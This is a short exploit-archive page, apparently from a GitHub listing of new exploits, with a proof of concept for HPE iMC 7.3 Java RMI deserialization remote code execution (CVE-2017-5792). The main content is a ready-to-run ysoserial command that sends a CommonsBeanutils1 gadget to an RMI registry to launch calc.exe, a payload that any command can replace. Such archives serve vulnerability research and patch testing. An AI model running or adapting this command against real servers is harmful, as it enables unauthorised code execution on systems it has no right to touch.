
8 changes to exploits/shellcodes LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow System Shield 5.0.0.136 - Privilege Escalation HPE iMC 7.3 - RMI Java Deserialization Advantech WebAccess < 8.3 - SQL Injection Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal Joomla! Component CP Event Calendar 3.0.1 - 'id' SQL Injection Joomla! Component Visual Calendar 3.1.3 - 'id' SQL Injection BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure
13 lines
No EOL
707 B
Text
13 lines
No EOL
707 B
Text
# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability
|
|
# Date: 01-28-2018
|
|
# Exploit Author: Chris Lyne (@lynerc)
|
|
# Vendor Homepage: www.hpe.com
|
|
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
|
|
# Version: iMC PLAT v7.3 (E0504) Standard
|
|
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
|
|
# CVE : CVE-2017-5792
|
|
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/
|
|
|
|
# note that this PoC will launch calc.exe
|
|
|
|
$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe |